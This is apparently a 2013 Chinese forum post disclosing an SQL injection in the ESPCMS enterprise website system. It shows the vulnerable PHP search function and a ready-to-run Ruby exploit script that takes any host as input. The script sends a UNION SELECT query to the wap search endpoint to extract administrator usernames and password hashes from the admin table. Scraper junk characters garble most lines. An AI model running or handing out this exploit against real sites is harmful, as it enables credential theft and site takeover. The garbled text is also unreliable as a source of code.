0×0 漏洞概述0×1 漏洞细节* }- ]9 g3 x3 s9 m$ r
0×2 PoC
3 w; }! P u9 ]8 G$ U% q0 Q$ G+ D& S% T- Z3 l( s
0 }. N i- w5 x" L3 K' P" ~5 Y
0×0 漏洞概述( P* V5 h! e1 w* H
7 r2 K6 T$ H' H( Q+ r0 X易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。" H( R- `' d6 W9 x+ q/ ~: ^, U O3 O
其在处理传入的参数时考虑不严谨导致SQL注入发生' v/ x( c. a* @1 O I' u) x" `1 y' Q+ f
: y* U9 k0 f, R; t$ ^5 X* C5 ~2 s5 t3 ~( S0 M
0×1 漏洞细节
- K8 f5 `( X# o, |, e/ c" |/ b% }: S- _
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
9 y+ [) v7 u2 t) z: h- Q正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。+ F0 M! {; U J2 [
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。/ g+ @( B! w7 Q* N/ y
- C0 j; P' R# |8 R: G在/interface/3gwap_search.php文件的in_result函数中:
7 m, F, z$ A" H `7 I* _' f9 \( g9 o3 G: Z- p) n
: [ m. Q+ e* P9 p9 N: |) v2 }
- n& z: n" `: I; a% [$ d. Z; r3 f8 O function in_result() {
+ P% H$ ~2 L1 f9 v ... ... ... ... ... ... ... ... .../ e0 {! k3 Z, J6 J# \
$urlcode = $_SERVER[ 'QUERY_STRING '];8 z$ F; O3 O" e+ _
parse_str(html_entity_decode($urlcode), $output);- C: `; b& o) f- m& W) B
# `8 _& R- |- Q ... ... ... ... ... ... ... ... ...
! S) C o, a$ w0 E9 w, p if (is_array($output['attr' ]) && count($output['attr']) > 0) {0 w6 s% _: Y* J4 a# J
; _" n/ g. u3 _) j: O
$db_table = db_prefix . 'model_att';8 `! |7 ^2 _5 y; M6 t
" N2 P1 p ]( E8 X- H& Z2 L foreach ($output['attr' ] as $key => $value) {2 l1 F8 E7 Y- M" B
if ($value) {; `6 k `( m1 {$ J2 u
7 |9 z8 M- Y. r2 u5 P
$key = addslashes($key);
* k! n3 h$ H0 {1 |% { $key = $this-> fun->inputcodetrim($key);
% c$ o8 h5 y- C( `. k $db_att_where = " WHERE isclass=1 AND attrname='$key'";
/ f7 |; y8 W8 O, s $countnum = $this->db_numrows($db_table, $db_att_where);$ G& m! ]/ a3 X( k! ~2 @
if ($countnum > 0) {
/ X W- ?( v: q# a $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;* P) x2 K0 q; z' z. t$ y
}" {0 a1 E. k' X+ h9 W
}6 c8 @+ x$ V: d- r. V+ G/ H
}
; y b9 G. @7 S3 a" h }. ^6 M- I4 q% P6 s1 i5 W
if (!empty ($keyword) && empty($keyname)) {
3 [. J0 d' Q! [2 \ $keyname = 'title';
; c. a8 g! ^7 {( G3 G5 a $db_where.= " AND a.title like '%$keyword%'" ;
: p/ V, e4 e o5 | } elseif (!empty ($keyword) && !empty($keyname)) {
( k# t1 q/ s2 |3 h3 ^. D' Y- k $db_where.= " AND $keyname like '% $keyword%'";, s9 ?- g) d, A- `! j8 m8 L: u" u
}
D9 A* [- ?; f, |* j0 I- m- m $pagemax = 15;
2 Y3 d P$ G# f9 S
/ _( C0 E- u1 }4 f; h' W6 }* {. R $pagesylte = 1;8 w8 e' \1 ~; C/ v3 v6 S- n
; ?9 F6 y( F: |* q if ($countnum > 0) {% ?9 [5 D' W+ ~, A5 U+ z! m) q! p
% h$ W4 u1 o& r7 `' @. | $numpage = ceil($countnum / $pagemax);& q" H& z" o8 `! U% m4 X
} else {: k& M1 c4 O% d5 x& }! P
$numpage = 1;
$ H O& i: J2 V1 u3 @' U2 A! S' c' ` }
' d- ~+ v3 T- F/ V9 } $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;, d% C* B. G: q3 S f
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);7 e- _( {% Q6 o
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);6 g$ a3 B, C% W3 F% p6 w1 `1 M0 `- }
... ... ... ... ... ... ... ... ...
, `3 O" y) R( \) W' y4 `- x }$ L/ B4 b# D1 Z9 k( K
9 V' a* k5 W. U" u; J7 _0 g
2 f2 {5 n: h7 s: y7 h' e' A
0×2 PoC" f, H7 C( }: a% O. U8 A/ @
# C5 c4 D% R# _9 a5 K0 }
2 a0 ]9 Z9 B2 w: z- d: Q3 I, I
( @: T9 s) g- L2 g1 B9 Y! }8 d: `) erequire "net/http"7 N0 V8 L8 f G. ~
$ P4 i2 B) t" ~! D7 h' ?6 @def request(method, url)
2 j7 `2 C$ a; l7 K0 \( O if method.eql?("get")
! N! W9 H& j9 D. j- X uri = URI.parse(url)
% g6 R! n" W/ n# C http = Net::HTTP.new(uri.host, uri.port)
' u8 d/ C: l$ E8 P/ P- E response = http.request(Net::HTTP::Get.new(uri.request_uri))4 D! X/ B8 z( N" r
return response
4 B+ T/ p! a$ A6 m- F end: y2 h7 n. a& p
end
# a4 @. @" O7 S* o0 F5 n, X
5 I2 _: ^6 O( R: q4 adoc =<<HERE
- ^, j) L+ ]! q7 g+ Z9 ~-------------------------------------------------------( X; q6 {- Y3 F. k! d& t0 M" D
Espcms Injection Exploit7 K; F' e) Y. z; J6 S n* s1 j% j- o
Author:ztz
5 z1 u4 u @- p! b2 N: U5 {Blog:http://ztz.fuzzexp.org/, E3 t2 j: G6 l* k) Y& I# f# [6 M
-------------------------------------------------------; P6 J% o- }$ N0 @7 t, f0 h
' w4 T. F' P6 s: ?8 p2 o
HERE
) J, Y% Q, c; K' D7 j. w# w$ r. L- [$ K7 L* T/ z" I
usage =<<HERE
, g! u, C4 X3 V- {Usage: ruby #{$0} host port path
5 R$ {+ Q8 A! {7 `5 @* U# L# @example: ruby #{$0} www.target.com 80 /" z/ f" o) U- L. i- ^0 r$ v) F" H
HERE9 P% x2 P9 _) u" K0 T3 S+ s
N5 d/ k! ?+ N. E8 Y9 ~% _& |puts doc/ R/ y5 s+ X/ T4 U
if ARGV.length < 3
- n9 m' F+ B' e5 ]. {0 u* P puts usage; i# K6 H3 \6 O* L# W
else
( w7 R) h0 I3 d% O9 @2 S& k $host = ARGV[0]
6 ~) L7 m: z2 j. w: p! ? $port = ARGV[1]
% W9 Z8 @/ W& m) H: m2 V7 ?* x, R. c, { $path = ARGV[2]! t) A n8 x7 P" M; Z; q
5 P9 N- e" F; n; j# P( v7 Z- Z
puts "send request..."- W7 M- _0 g9 ^0 b6 A' }& ~& Z. o
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
* C2 ^8 a- t7 J2 a$ A) x, S/ Xattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13% U8 D+ o, @2 Q; d* s3 \! |
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
' I) V. H/ L8 C: C,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
% y* }+ n% r- I# l response = request("get", url)
2 p |( o/ R; t/ ]! K result = response.body.scan(/\w+&\w{32}/)( A \' d& B7 v
puts result- O3 o$ l: M& x' p. r
end
+ z7 [, d5 @* Z( a
5 x4 _8 I$ W0 a, r |
发表于 2013-7-27 18:31:52
收藏
支持
反对